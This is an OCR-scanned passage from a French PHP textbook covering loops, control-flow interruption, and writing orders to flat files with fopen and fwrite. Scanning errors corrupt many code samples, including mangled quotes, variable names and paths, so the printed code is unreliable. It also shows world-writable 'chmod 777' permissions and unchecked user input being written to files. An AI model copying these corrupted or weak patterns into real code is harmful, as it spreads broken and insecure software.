Termine ^ 



Le Listing 1.2 contient le code HTML qui produit ce tableau. Vous pouvez constater 
qu'il est long et repetitif. 

Listing 1.2 : freight.html — Code HTML generant le tableau des couts d'expedition 
payes par Bob 



<html> 
<body> 

<table border ="0" cellpadding ="3"> 
<tr> 



i-igure 7./ 

Ce tableau donne les 
frais d'expedition en 
fonction de la distance. 
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<td bgcolor ="#CCCCCC" align ="center">Distance</td> 
<td bgcolor ="#CCCCCC" align ="center">Cout</td> 

</tr> 

<tr> 

<td align = 1 right 1 >50</td> 

<td align = 1 right 1 >5</td> 
</tr> 
<tr> 

<td align = 1 right 1 >100</td> 

<td align =' right '>10</td> 
</tr> 
<tr> 

<td align =' right ' >150</td> 

<td align =' right ' >1 5</td> 
</tr> 
<tr> 

<td align =' right ' >200</td> 

<td align =' right ' >20</td> 
</tr> 
<tr> 

<td align =' right ' >250</td> 

<td align =' right ' >25</td> 
</tr> 
</table> 
</body> 
</html> 



Du fait de sa structure repetitive, ce code HTML pourrait etre genera a partir d'un script 
plutot que manuellement. Nous disposons pour cela des structures de repetition qui 
permettent d'executer une instruction ou un bloc de code de maniere repetitive. 

Boucles while 

La boucle while est la structure de repetition la plus simple de PHP. Tout comme 
une structure if, elle repose sur le test d'une condition. Une boucle while differe 
toutefois d'une structure if par le fait qu'elle execute le bloc de code qui la suit tant 
que la condition reste vraie alors qu'une structure if n'execute qu'une fois ce bloc 
de code si la condition est vraie. Une boucle while s'utilise en general lorsqu'on 
ignore le nombre de repetitions a effectuer pour faire passer la condition de "vrai" a 
"faux". Lorsque le nombre de repetitions est connu a l'avance, mieux vaut employer 
une boucle for. 

Voici la structure de base d'une boucle while : 

while ( condition ) expression; 

La boucle while qui suit produit l'affichage des nombres compris entre 1 et 5 : 

$nbre = 1 ; 

while ($nbre <= 5 ) 
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{ 

echo $nbre . "<BR />" ; 
$nbre++; 

} 

La condition est testee avant chaque iteration : si elle est fausse, le bloc n'est pas 
execute et l'execution de la boucle prend fin. Linterpreteur PHP passe alors a l'instruction 
qui suit la boucle while. 

Nous pouvons utiliser une boucle while pour accomplir une tache un peu plus utile, 
comme afficher le tableau des couts d'expedition montre a la Figure 1.7. 

Le code donne dans le Listing 1.3 utilise une boucle while pour generer le tableau des 
frais d'expedition. 

Listing 1.3 : freight.php — Generation du tableau des frais d'expedition en PHP 

<html> 
<body> 

<table border="0" cellpadding="3"> 
<tr> 

<td bgcolor="#CCCCCC" align="center">Distance</td> 

<td bgcolor="#CCCCCC" align="center">Cout</td> 
</tr> 
<?php 

$distance = 50; 

while ($distance <= 250 ) 

{ 

echo "<tr>\n <td align= ' right ' >$distance</td>\n" ; 

echo " <td align = ' right ' > " . $distance / 10 . "</td>\n</tr>\n" ; 

$distance += 50; 

} 

?> 

</table> 

</body> 

</html> 



Pour que le code HTML produit par ce script soit plus lisible, vous devez ajouter des 
sauts de lignes et des espaces. Comme on l'a deja evoque, les navigateurs les ignore- 
ront, mais ils seront utiles aux lecteurs. Examinez le code HTML produit par vos scripts 
pour vous assurer qu'il reste lisible. 

Dans le Listing 1.3, vous pouvez constater que Ton a ajoute la sequence \n dans certai- 
nes chaines. Cette sequence represente le caractere de nouvelle ligne et produira done 
un saut de ligne lorsqu'il sera affiche. 
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Boucles for et foreach 

L'emploi que nous avons fait de la boucle while dans l'exemple precedent est tres 
classique. Nous avons defini un compteur au debut de la boucle. Avant chaque iteration, le 
compteur est teste par une condition. A la fin de chaque iteration, le compteur est 
modifie. 

II est possible d'ecrire ce style de boucle de maniere plus compacte avec une boucle 
for. 

La structure d'une boucle for est la suivante : 

for( expressionl; condition; expression2) 
expressions; 

■ expression 1 est executee une fois au debut de la boucle et contient normalement la 
valeur initiale d'un compteur. 

■ L' expression condition est testee avant chaque iteration. Si condition se revele 
fausse, l'execution de la boucle s'interrompt. Cette expression est generalement 
utilisee pour tester si le compteur a atteint une certaine limite. 

■ expression2 est executee a la fin de chaque iteration et c'est generalement la que 
Ton met a jour la valeur du compteur. 

■ expressions est executee une fois par iteration. Cette expression est generalement 
un bloc de code et constitue le corps de la boucle. 

Nous pouvons reecrire la boucle while du Listing 1.3 avec une boucle for. Le code 
PHP devient alors : 

<?php 

for($distance = 50; $distance <= 250; $distance += 50) 
{ 

echo "<tr>\n <td align= 1 right ' >$distance</td>\n" ; 

echo " <td align= 1 right 1 >" . $distance / 10 . "</td>\n</tr>\n" ; 

} 

?> 

Les deux versions proposees ici, avec une boucle while et avec une boucle for, sont 
identiques d'un point de vue fonctionnel mais la boucle for apparait legerement plus 
compacte (elle contient deux lignes de moins que la boucle while). 

Ces deux types de boucles sont equivalents : aucun n'est meilleur que 1' autre. Dans 
chaque situation, il vous appartient de choisir celui qui vous semble le plus intuitif. 

Notez qu'il est possible de combiner des variables dynamiques avec une boucle for 
pour traiter automatiquement une suite de champs de formulaire. Si, par exemple, le 
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formulaire contient des champs nom1, nom2, nom3, etc., vous pouvez implementer leur 
traitement de la maniere suivante : 

for ($i=1; $i <= $nbre_noms; $i++) 
{ 

$temp= "nom$i"; 

echo $$temp.'<br />'; // ou tout autre traitement necessaire 

} 

En creant dynamiquement les noms des variables, nous pouvons acceder successivement 
aux differents champs du formulaire. 

Signalons qu'il existe egalement une boucle f oreach specifiquement concue pour les 
tableaux. Nous montrerons comment l'utiliser au Chapitre 3. 

Boucles do... while 

Le dernier type de boucle qu'il nous reste a etudier a un comportement legerement 
different. La structure generale d'une boucle do...while est la suivante : 

do 

expression; 
while ( condition ) ; 

Une boucle do...while differe d'une boucle while en ce que sa condition est testee a la 
fin de chaque iteration. II s'ensuit que dans une boucle do...while l'instruction ou le bloc 
formant le corps de la boucle est systematiquement execute une fois au moins. 

Dans l'exemple qui suit, ou la condition se revele fausse d'emblee et ne peut jamais etre 
vraie, la boucle est executee une premiere fois avant que la condition ne soit evaluee et 
que 1' execution de la boucle prenne fin : 

$nbre = 100; 

do 

{ 

echo $nbre . ' <BR /> 1 ; 

} 

while ($nbre < 1 ) ; 

Interruption de I'execution d'une structure de controle 
ou d'un script 

Pour interrompre I'execution d'un morceau de code, trois approches sont envisageables, 
selon l'effet recherche. 

Pour arreter I'execution d'une boucle, vous pouvez utiliser l'instruction break, comme 
nous l'avons deja fait dans la section traitant de la structure switch. Lorsqu'une instruc- 
tion break est inseree dans une boucle, I'execution du script se poursuit a la ligne du 
script qui suit la boucle. 
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Pour interrompre l'execution d'une iteration d'une boucle et passer directement a 
l'iteration suivante, vous pouvez employer l'instruction continue. 

Pour interrompre defmitivement l'execution d'un script PHP, vous pouvez utiliser 
l'instruction exit. Celle-ci est particulierement utile lors du traitement des erreurs. 
L'exemple donne plus haut pourrait ainsi etre modifie de la maniere suivante : 

if( $qte_totale == 0) 
{ 

echo 'Votre commande ne contient aucun article !<br>'; 
exit; 

} 

L'appel de la fonction exit empeche l'interpreteur PHP d'executer le reste du script. 



Employer I'autre syntaxe des structures de controle 

Pour toutes les structures de controle que nous avons examinees, il existe une syntaxe 
alternative. Elle consiste a remplacer l'accolade ouvrante ({) par un signe deux points 
(:) et l'accolade fermante par un nouveau mot-cle, qui sera endif, endswitch, 
endwhile, endfor ou endf oreach, selon la structure de controle utilisee. Aucune 
syntaxe alternative n'est proposee pour les boucles do . . .while. 

Par exemple, le code suivant : 

if( $qte_totale == 0) 
{ 

echo 'Votre commande ne contient aucun article !<br />'; 
exit; 

} 

pourrait etre converti dans cette nouvelle syntaxe en utilisant les mots-cles if et endif : 

if ( $qte_totale == 0) : 

echo 'Votre commande ne contient aucun article !<br />'; 

exit; 
endif; 



Utiliser declare 

Une autre structure de controle de PHP, la structure declare, n'est pas utilisee aussi 
frequemment pour la programmation quotidienne que ne le sont les autres structures. 
La forme generale de cette structure de controle est la suivante : 

declare (directive) 
{ 

// bloc 
} 
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Cette structure sert a definir des directives d'execution pour le bloc de code - autrement 
dit, des regies specifiant de quelle maniere le code qui suit doit etre execute. Actuelle- 
ment, seule une directive d'execution, appelee ticks, a ete implementee. Elle se definit 
en inserant la directive ticks=n et vous permet d'executer une fonction specifique 
toutes les n lignes dans le bloc de code, ce qui est principalement utile pour le profilage 
et le debogage. 

La structure de controle declare n'est mentionnee ici que par souci d'exhaustivite. 
Nous presenterons quelques exemples concernant l'utilisation des fonctions tick aux 
Chapitres 23 et 24. 

Prochaine etape : enregistrement de la commande du client 

Vous savez a present recevoir et manipuler la commande d'un client. Au cours du 
prochain chapitre, nous verrons comment enregistrer cette commande de sorte a 
pouvoir la retrouver et la traiter ulterieurement. 



2 



Stockage et recuperation 

des donnees 

Maintenant que vous savez acceder aux donnees saisies dans un formulaire HTML et 
manipuler ces donnees, nous pouvons examiner les moyens de stockage de ces infor- 
mations qui permettent de les retrouver et de les utiliser ulterieurement. Dans notre 
exemple, les commandes passees en ligne par les clients doivent etre enregistrees, de 
sorte a pouvoir les traiter et les satisfaire ulterieurement. 

Dans ce chapitre, nous verrons comment, dans le contexte de l'exemple precedent, 
ecrire dans un fichier la commande transmise par un client et comment la lire ensuite a 
partir de ce fichier. Nous verrons egalement qu'un tel stockage ne constitue pas toujours 
une bonne solution. Si le nombre de commandes est eleve, l'emploi d'un systeme de 
gestion de base de donnees comme MySQL devient indispensable. 

Stockage des donnees en vue d'un usage ulterieur 

Deux modes de stockage des donnees sont envisageables : dans des fichiers "plats" ou 
dans une base de donnees. 

Un fichier plat peut etre enregistre sous de nombreux formats. En general, toutefois, 
l'expression "fichier plat" designe un simple fichier texte. Dans notre exemple, nous 
ecrirons les commandes client dans un fichier texte, a raison d'une commande par ligne. 

Ce mode de stockage est tres simple a mettre en oeuvre mais se revele assez limite, 
comme nous le verrons un peu plus loin dans ce chapitre. Si les informations a traiter 
atteignent un certain volume, l'usage d'une base de donnees est fortement recommande. 
Les fichiers plats restent neanmoins tres utiles dans certaines situations et meritent que 
vous sachiez les manipuler. 
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L' denture et la lecture dans des fichiers s'effectuent quasiment de la meme maniere 
dans tous les langages de programmation. Si vous connaissez un peu la program- 
mation C ou les scripts shell Unix, les principes decrits ici vous seront done tres 
familiers. 

Stockage et recuperation des commandes de Bob 

Dans ce chapitre, nous considererons une version legerement modifiee du formulaire de 
commande examine dans le premier chapitre. Nous partirons de ce formulaire et du 
code PHP que nous avons ecrit pour traiter les donnees entrees par les clients. 

— Info 

Vous trouverez tous les scripts HTML et PHP utilises dans ce chapitre dans le repertoire 
chapitre 02 a telecharger sur le site Pearson. 



Nous avons modifie le formulaire pour lui ajouter un champ permettant de saisir 
l'adresse de livraison du client (voir Figure 2.1). 



Figure 2. 1 

Dans cette version du for- 
mulaire de commande 
de I'entreprise de Bob, 
un champ supplementaire 
est propose pour la saisie 
de l'adresse de livraison. 



Le garage de Bob 


CD 
(g) ®, 




Le garage de Bob 




Formulaire de commande 






Pneus 




Huilcs 




Bougies 




Adrcssc dc livraison 


C Passer commande *) 


Termine 





Le champ de formulaire pour l'adresse de livraison s'appelle adresse : , vous pouvez 
done acceder a sa valeur via $ REQUEST! ' adresse ' ], $ POST[ ' adresse ' ] ou 
$ GET[ ' adresse ' ] , selon la methode de soumission du formulaire (pour plus d'infor- 
mations, consultez le Chapitre 1). Nous ecrirons dans le meme fichier chaque nouvelle 
commande transmise par un client. Puis nous construirons une interface web grace a 
laquelle l'equipe de Bob pourra visualiser les commandes re5ues. 
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Presentation des fonctions de traitement des fichiers 

L' ecriture dans un fichier s'effectue en trois etapes : 

1. Ouverture du fichier. Si le fichier n'existe pas encore, il doit etre cree. 

2. Ecriture des donnees dans le fichier. 

3. Fermeture du fichier. 

De la meme maniere, la lecture des donnees d'un fichier s'effectue en trois etapes : 

1. Ouverture du fichier. Si l'ouverture du fichier se revele impossible (par exemple 
parce que le fichier n'existe pas), nous devons le detecter et interrompre correctement 
le processus engage. 

2. Lecture des donnees dans le fichier. 

3. Fermeture du fichier. 

Lors de la lecture de donnees dans un fichier, vous pouvez preciser la proportion du 
fichier qui sera lue a chaque operation de lecture. Nous allons decrire en detail les diffe- 
rentes possibilites qui se presentent. 

Pour l'instant, commencons par ouvrir un fichier. 

Ouverture d'un fichier 

En PHP, l'ouverture d'un fichier s'effectue au moyen de la fonction fopen( ). Lors de 
l'ouverture d'un fichier, vous devez specifier le mode d'ouverture, c'est-a-dire la 
maniere dont vous voulez l'utiliser. 

Modes d'ouverture des fichiers 

Lorsque vous ouvrez un fichier, vous devez vous prononcer sur trois points : 

1. Vous avez la possibility d'ouvrir un fichier en lecture seule, en ecriture seule, ou 
bien encore en lecture et en ecriture. 

2. Pour ecrire des donnees dans le fichier, vous pouvez soit remplacer le contenu exis- 
tant par vos nouvelles donnees ("ecraser" le contenu), soit ajouter les nouvelles 
donnees a la suite du contenu existant. Vous pourriez egalement souhaiter terminer 
votre programme de maniere controlee au lieu d'ecraser un fichier si le fichier existe 
deja. 

3. Si vous ecrivez un fichier dans un systeme qui differencie les fichiers binaires des 
fichiers texte, vous devez specifier le type souhaite pour votre fichier. 

La fonction f open ( ) permet de specifier vos choix concernant ces trois points. 
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Utilisation de fopen() pour ouvrir un fichier 

Supposons que nous voulions enregistrer une commande client dans le fichier regrou- 
pant les commandes de l'entreprise de Bob. Nous pouvons ouvrir ce fichier en denture 
de la maniere suivante : 

$fp = fopen("$D0CUMENT_R00T/. ./orders/orders. txt", 'w'); 

Lorsqu'elle est invoquee, la fonction fopen( ) attend deux, trois ou quatre parametres. 
Le plus souvent, vous n'en donnerez que deux, comme dans la ligne de code prece- 
dente. 

Le premier parametre est le nom du fichier a ouvrir. Ce nom peut eventuellement conte- 
nir un chemin d'acces, comme dans l'instruction precedente (le fichier orders .txt est 
enregistre dans le repertoire orders). Nous avons utilise la variable predefinie de PHP 
$ SERVER[ 1 DOCUMENT ROOT ' ] mais, comme il est peu pratique de manipuler des variables 
aux noms longs, nous lui avons attribue un nom abrege. 

Cette variable pointe sur la racine de l'arborescence des documents du serveur web. La 
paire de points (" . . ") signifie "le repertoire pere du repertoire racine des documents" : 
ce repertoire est done situe a l'exterieur de l'arborescence des documents pour des 
raisons de securite. En effet, ce fichier doit demeurer inaccessible a partir du Web, sauf 
par le biais de 1' interface que nous allons fournir a cet effet. Un tel chemin d'acces est 
qualifie de relatif, parce qu'il decrit un emplacement dans le systeme de fichier par 
rapport a la racine de l'arborescence des documents. 

Puisque nous preferons utiliser le style abrege pour le referencement des variables, il 
nous faut ajouter la ligne suivante au debut de notre script : 

$DOCUMENT_ROOT = $_SERVER[ ' D0CUMENT_R00T ' ] ; 

pour copier le contenu de la variable exprimee dans le style long dans une variable au 
nom abrege. 

De la meme facon que nous disposons de plusieurs possibilites pour acceder a des 
donnees de formulaire, il y a differentes possibilites pour acceder aux variables predefi- 
nies du serveur. Selon la configuration de votre serveur, vous pouvez designer la racine 
de F arborescence des documents par : 

■ $ SERVER [ 'DOCUMENT ROOT'] 
B SDOCUMENT ROOT 

■ $HTTP SERVER VARS [ 1 DOCUMENT ROOT'] 

Comme pour les donnees de formulaire, nous conseillons d'utiliser le premier style. 

II est egalement possible d'indiquer un chemin d'acces absolu, e'est-a-dire partant du 
repertoire racine (/ dans un systeme Unix et generalement C:\ dans un systeme 
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Windows). Sur notre serveur Unix, ce chemin serait de la forme /home/book/orders. 
Le probleme de cette approche, surtout si vous faites heberger votre site sur le serveur 
d'un tiers, est que le chemin absolu peut changer. Nous l'avons appris a nos depens 
lorsque les administrateurs systeme ont decide de modifier la structure des repertoires 
sans crier gare et qu'il nous a fallu precipitamment changer les chemins absolus dans un 
grand nombre de scripts. 

Lorsque aucun chemin d'acces n'est specine, le fichier est cree ou recherche dans le 
meme repertoire que celui contenant le script. Ce comportement peut toutefois differer 
si PHP est execute par le biais d'un wrapper CGI ; il depend aussi de la configuration du 
serveur. 

Dans un environnement Unix, vous devez utiliser des barres obliques (/) dans les 
chemins d'acces aux repertoires tandis que, sur une plate-forme Windows, vous pouvez 
aussi bien employer des barres obliques que des barres obliques inversees (\). Si vous 
utilisez des barres obliques inverses lors d'un appel a f open, vous devez les "proteger" 
pour qu'elles soient correctement interpretees. Pour cela, il suffit de doubler les barre 
obliques inverses, comme ici : 

$fp = f open ("$D0CUMENT_R00T\\. .WordersWorders.txt", '«/'); 

Tres peu de gens utilisent des barres obliques inverses (pour faire court, on les appelle 
souvent antislashes) pour specifier des chemins d'acces en PHP car le code qui en 
resulte ne pourrait s'executer que sur Windows. Si vous utilisez des barres obliques, au 
contraire, votre code fonctionnera sans modification aussi bien sur des ordinateurs 
Windows qu'Unix. 

Le deuxieme parametre a passer a la fonction fopen() est le mode d'ouverture du 
fichier, qui doit etre specine sous la forme d'une chaine. Celui-ci indique l'usage prevu 
pour le fichier. Dans l'exemple considere ici, nous avons utilise la valeur 'w', ce qui 
signifie que le fichier doit etre ouvert en denture. Le Tableau 2. 1 recapitule les diffe- 
rents modes d'ouverture disponibles. 



Tableau 2.1 : Recapitulatif des differents modes d'ouverture d'un appel a fopen 



Mode 


Nam du mode 


Signification 


r 


Lecture 


Le fichier est ouvert en lecture, a partir de son debut. 


r+ 


Lecture 


Le fichier est ouvert en lecture et en ecriture, a partir de 
son debut. 


w 


Ecriture 


Le fichier est ouvert en ecriture, a partir de son debut. Si le 
fichier existe deja, son contenu est ecrase. Dans le cas 
contraire, le fichier est cree. 
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Tableau 2.1 : Recapitulatif des differents modes d'ouverture d'un appel a fopen (suite) 



Mode 

w+ 



x+ 



Nom du mode 

Ecriture 

Ecriture prudente 

Ecriture prudente 

Ajout 

Ajout 

Binaire 



Texte 



Signification 

Le fichier est ouvert en ecriture et en lecture, a partir de 
son debut. Si le fichier existe deja, son contenu est ecrase. 
Dans le cas contraire, le fichier est cree. 

Le fichier est ouvert en ecriture, a partir de son debut. Si le 
fichier existe deja, il n'est pas ouvert : fopen ( ) renvoie 
false et PHP produit un avertissement. 

Le fichier est ouvert en ecriture et en lecture, a partir de 
son debut. Si le fichier existe deja, il n'est pas ouvert : 
fopen ( ) renvoie false et PHP produit un avertissement. 

Le fichier est ouvert en ajout (ecriture) uniquement, en 
commengant a la fin du contenu existant. Si le fichier 
n' existe pas, PHP tente de le creer. 

Le fichier est ouvert en ajout (ecriture) et lecture, en 
commengant a la fin du contenu existant. Si le fichier 
n' existe pas, PHP tente de le creer. 

Utilise en conjonction avec l'un des autres modes 
d'ouverture dans les systemes de fichiers faisant la 
distinction entre les fichiers binaires et les fichiers texte 
(c'est le cas des systemes Windows, mais pas d'Unix). 
Les developpeurs PHP recommandent d'utiliser toujours 
cette option pour une portability optimale. II s'agit du 
mode par defaut. 

Utilise en conjonction avec l'un des autres modes. II n'est 
propose en option que sur les systemes Windows et nous 
deconseillons de l'utiliser, sauf avant d' avoir porte votre 
code pour qu'il fonctionne avec l'option b. 



Le choix du mode d'ouverture depend de la maniere dont le systeme doit etre utilise. 
Dans l'exemple donne ici, le choix du mode "w" implique que le fichier ne pourra conte- 
nir qu'une seule commande client a la fois : a chaque entree d'une nouvelle commande, 
la commande existante sera effacee et remplacee par la nouvelle. Ce choix n'est 
evidemment pas le plus judicieux et le mode "a" apparait plus approprie (avec le mode 
binaire, selon la recommandation) : 

$fp = f open ("$D0CUMENT_R00T/. ./orders/orders. txt", 'ab'); 

Le troisieme parametre de fopen ( ) est facultatif. II permet de rechercher un fichier dans 
la liste des repertoires indiquee par include path (qui est definie dans la configuration 



Chapitre 2 



Stockage et recuperation des donnees 69 



de PHP ; voir 1' Annexe A). Pour effectuer une telle recherche, le troisieme parame- 
tre doit valoir 1. Si vous demandez a PHP de se servir de la valeur du parametre 
include path, il est inutile de fournir un nom de repertoire ou un chemin d'acces : 

$fp = fopen( 'orders.txt ' , 'ab', true); 

Le quatrieme parametre est egalement facultatif. La fonction f open ( ) permet aux noms 
de fichiers d'etre prefixes avec un protocole (comme http : / /) et ouverts a un emplace- 
ment distant. Certains protocoles autorisent un parametre supplementaire. Nous traiterons 
de cet usage de la fonction f open ( ) dans les sections suivantes de ce chapitre. 

Si fopen( ) reussit a ouvrir le fichier, elle renvoie une ressource qui est un descripteur 
du fichier et qui doit etre enregistre dans une variable ($f p dans le cas present). Cette 
variable permet ensuite d'acceder au fichier pour y lire ou y ecrire des donnees. 

Ouverture de fichiers via FTP ou HTTP 

De la meme maniere que vous pouvez ouvrir des fichiers locaux en lecture ou en den- 
ture, fopen( ) vous permet d'ouvrir des fichiers via FTP (File Transfer Protocol) ou 
HTTP (Hyper Text Transfer Protocol). Vous pouvez empecher cette fonctionnalite en 
desactivant la directive allow url f open dans le fichier php.ini. Si vous rencontrez 
des problemes pour ouvrir les fichiers distants avec fopen(), verifiez votre fichier 
php.ini. 

Lorsque le nom de fichier utilise commence par f tp : / / , une connexion FTP en mode 
passif est ouverte sur le serveur indique et f open ( ) renvoie un pointeur sur le debut du 
fichier. 

Lorsque le nom de fichier utilise commence par http://, une connexion HTTP est 
ouverte sur le serveur indique et f open ( ) renvoie un pointeur sur la reponse fournie. Si 
vous utilisez le mode HTTP avec d'anciennes versions de PHP, vous devez terminer les 
noms de repertoires par des barres obliques, comme ici : 

http : / /www. example . com/ 

N'ecrivez pas : 

http : / /www. example . com 

Avec cette derniere formulation (sans barre oblique finale), le serveur web effectuera 
normalement une redirection HTTP de sorte a vous renvoyer vers la premiere adresse 
(avec la barre oblique finale). Faites l'essai avec votre navigateur. 

Notez bien que la casse (l'usage de minuscules/majuscules) n'a pas d'importance 
dans les noms de domaines mais peut en avoir dans les noms et chemins d'acces des 
fichiers. 



70 Partie I 



Utilisation de PHP 



Problemes d'ouverture de f ichiers 

Une des erreurs les plus frequemment commises a l'ouverture des fichiers consiste a 
essayer d'ouvrir un fichier sans beneficier de la permission adequate. Cette erreur 
survient couramment sur les systemes d' exploitation de type Unix, mais vous pouvez 
egalement la voir apparaitre occasionnellement sous Windows. Dans une telle situation 
d'erreur, PHP envoie un avertissement comme celui de la Figure 2.2. 



Le garage de Bob - Resultats de la commande 

I »• (e) (X) (U'>ttp:/;tocaih^r ) - fpj ^oT) (JD 
Le garage de Bob 

Resultats de la commande 

Commande traiuic a 2 1 :27 , le 23- 10-2008 

Rccapitulatif dc votre commande : 

Articles commandes : 5 
2 pneus 

1 bidons d'huile 

2 bougies 

Total de la commande : 218.00€ 

Adrcsse de livraison : 21 rue de la pompc, 75020 Paris 

Warning: fopcn(ordcrs.txt) i function.fopcn l: failed to open stream: Permission 
denied in /Users/jaco/Sites/cliapitre 2/processorder2.php on line 63 

Ternlin ^ A 

Figure 2.2 

PHP affiche un avertissement explicite lorsque l'ouverture d'un fichier est impossible. 

Face a une telle erreur, vous devez verifier que l'utilisateur sous le compte duquel le script 
s'execute beneficie des permissions d'acces adequates pour le fichier a utiliser. Selon la 
maniere dont est configure votre serveur, le script peut etre execute sous le compte du 
serveur web ou sous celui du proprietaire du repertoire contenant le script. 

Dans la plupart des systemes, les scripts sont executes sous le compte du serveur web. 
Si, par exemple, votre script est place dans le repertoire -/public _html/chapitre02/ 'd'un 
systeme Unix, vous pouvez creer un repertoire accessible a tout le monde en denture 
afin d'y stacker la commande : 

mkdir -/orders 
chmod 777 -/orders 
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Gardez bien a 1' esprit le danger que constituent les repertoires et les fichiers dans 
lesquels tout le monde peut ecrire. Vous devez imperativement eviter d'autoriser 1' den- 
ture dans des repertoires directement accessibles a partir du Web. C'est pour cette raison 
que, dans l'exemple decrit ici, le repertoire orders se situe a deux sous-repertoires en 
amont, sous le repertoire public _html. Nous aborderons plus en detail cet aspect de la 
securite au Chapitre 13. 

Si un mauvais parametrage des permissions d'acces constitue l'erreur la plus commune 
lors de l'ouverture d'un fichier, d'autres erreurs peuvent egalement etre commises. 
Lorsqu'un fichier ne peut pas etre ouvert, il est capital que vous en soyez informe, pour 
eviter de tenter d'y lire ou d'y ecrire des donnees. 

Lorsque l'appel de la fonction fopen( ) echoue, celle-ci renvoie la valeur false. Vous 
pouvez alors traiter l'erreur survenue avec plus de convivialite en supprimant le 
message d'erreur PHP et en produisant votre propre message d'erreur : 

@ $fp = f open ( "$DOCUMENT_ROOT/ .. /orders/orders. txt 11 , 1 ab ' ) ; 

if (!$fp) 
{ 

echo ' <p><strong>Nous ne pouvons pas traiter votre commande ' . 
'pour le moment. Reessayez plus tard.</strong></p>' . 
' </body></html> 1 ; 

exit; 

} 

La presence du symbole @ avant l'appel de la fonction f open( ) informe PHP qu'il doit 
supprimer toute erreur produite par 1' appel a la fonction. II est generalement preferable 
d'etre informe lorsqu'un probleme survient mais, dans le cas present, nous nous occu- 
perons des erreurs a un autre endroit du script. 

Cette ligne peut egalement etre ecrite de la maniere suivante : 

$fp = @fopen( "$DOCUMENT_ROOT/ .. /orders/orders. txt" , 'a'); 

Mais cette formulation rend moins evident le recours a l'operateur de suppression des 
erreurs. 

La methode decrite ici est un moyen tres simple de gerer les erreurs. Nous presenterons 
une methode plus elegante au Chapitre 7. Chaque chose en son temps. 

L'instruction if teste la variable $f p pour determiner si l'appel a f open a renvoye un 
descripteur de fichier valide. Si ce n'est pas le cas, elle affiche un message d'erreur et 
interrompt 1' execution du script. La page se terminant alors a ce stade, nous avons 
inclus les balises de fermeture HTML appropriees de maniere a produire un code 
HTML valide. 
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Avec cette derniere approche, le resultat obtenu a l'execution du script est celui de la 
Figure 2.3. 



Figure 2.3 



Pour plus de convivia- 
lite, vous pouvez 
afficher vos propres 
messages d'erreur a 
la place des avertis- 
sements produits par 
PHP. 



Le garage de Bob - Resultats de la commande 
Q | ■ p (5) CXJ C|^fhttp://lQt:alhQsl/~jac /ch^T^ ) ■ (jgj^Q) (Jf) 



Le garage de Bob 
Resultats de la commande 

Commande traitcc a 20:16, 1c 6-10-2008 

Recapitularif de votre commande : 

Articles commandes : 5 
2 prions 

1 bidons d'huile 

2 bougies 

Total de la commande : 21S.00€ 

Adrcssc de livraison : 21,mede la pompe, 31000 Toulouse 

Nous ne pouvous pas trailer votre commande pour le moment. Reessayez plus tard. 



Ecriture dans un fichier 

L' denture dans un fichier est une operation assez simple a realiser en PHP. Vous pouvez 
utiliser l'une ou 1' autre des fonctions f write ( ) et f puts ( ) ; la seconde est un alias de la 
premiere. Dans notre exemple, l'appel a fwrite() peut s'effectuer de la maniere 
suivante : 

fwrite($fp, $chaine_sortie) ; 

Cette instruction demande a l'interpreteur PHP d'ecrire la chaine stockee dans la variable 
$chaine sortie dans le fichier decrit par $f p. 

La fonction file put contents () est une alternative a fwrite(). Elle possede le 
prototype suivant : 

int f ile_put_contents ( string nomfichier , 

string donnees 
[ , int drapeaux 
[, resource contexte] ] ) 

Cette fonction ecrit la chaine contenue dans donnees dans le fichier nomfichier sans 
requerir d'appel a la fonction fopen( ) (ni f close ( )). Cette fonction est apparue avec 
PHP5, tout comme file get contents ( ) que nous presenterons bientot. Les parame- 
tres facultatifs drapeaux et contexte sont le plus souvent utilises lors de l'ecriture vers 
des fichiers distants en utilisant par exemple HTTP ou FTP (nous presenterons ces 
fonctions au Chapitre 18). 
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Parametres de la fonction fwrite() 

La fonction f write ( ) prend trois parametres, le troisieme etant facultatif. Le prototype 
de f write ( ) est le suivant : 

int f puts(resource descripteur, string chaine[, int longueur]) ; 

Le troisieme parametre, longueur, indique le nombre maximal d'octets a ecrire. Lors- 
que ce parametre est fourni, la fonction fwrite() ecrit le contenu de chatne dans le 
fichier decrit par descripteur, jusqu'a atteindre la fin de la chaine ou jusqu'a avoir ecrit 
le nombre d'octets specine dans longueur. 

Vous pouvez connaitre la longueur d'une chaine en utilisant la fonction integree 
strlen ( ) de PHP, comme ceci : 

fwrite($fp, $chaine_sortie, strlen ($chaine_sortie) ) ; 

Vous pouvez utiliser ce troisieme parametre lors de l'ecriture en mode binaire, car il 
permet d'eviter certains problemes de compatibility entre les plates-formes. 

Formats de f ichiers 

Lors de la creation d'un fichier de donnees comme celui que nous avons cree dans notre 
exemple, le choix du format de stockage des donnees vous appartient (bien sur, si vous 
prevoyez d' utiliser le fichier de donnees avec une autre application, vous devez en tenir 
compte dans votre choix). 

Construisons une chaine representant un enregistrement dans notre fichier de donnees. 
Nous pouvons proceder comme ceci : 

$chaine_sortie = "$date\t$qte_pneus pneus\t$qte_huiles bidons " . 

"d ' huile\t$qte_bougies bougies\t$montant_total €\t" . 
"$adresse\n" ; 

Dans cet exemple simple, chaque commande est stockee dans une ligne distincte du 
fichier des commandes. L'ecriture d'un enregistrement par ligne nous permet en effet 
d'utiliser un separateur d'enregistrement simple : le caractere de nouvelle ligne. Les 
caracteres de nouvelle ligne sont invisibles et sont representes par la sequence " \ n " . 

Pour chaque nouvelle commande, les champs de donnees sont dents dans le meme 
ordre et sont distingues les uns des autres par le caractere de tabulation, represente par 
la sequence " \ t " . Mieux vaut choisir un delimiteur de champ qui facilite ensuite la 
recuperation des donnees. 

Le separateur ou delimiteur doivent etre des caracteres peu susceptibles d'etre contenus 
dans les donnees entrees, faute de quoi nous devrions traiter ces donnees pour retirer ou 
proteger toutes les instances du delimiteur. Nous reviendrons sur le traitement des 
donnees fournies en entree au Chapitre 4. Pour l'heure, nous supposerons qu'aucun 
client n'a introduit de tabulation au cours de sa saisie dans le formulaire de commande. 
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II est difficile, mais pas impossible, qu'un utilisateur d'un formulaire HTML insere une 
tabulation ou un saut de ligne dans un champ de saisie HTML d'une seule ligne. 

En utilisant un separateur de champ special, nous pourrons par la suite scinder plus 
facilement les donnees en variables distinctes lorsque nous voudrons recuperer les 
donnees contenues dans le fichier. Nous reviendrons sur ce point au Chapitre 3. Pour 
l'instant, nous nous contenterons de traiter chaque commande comme une chaifie d'un 
seul tenant. 

Le Listing 2.1 donne un exemple du contenu du fichier orders.txt apres l'ecriture de 
quelques commandes. 

Listing 2.1 : orders.txt — Exemple de contenu possible 

20:30, le 31-03 4 pneus 1 bidons d'huile 6 bougies 434.00 € 22 rue de la pompe, Paris 
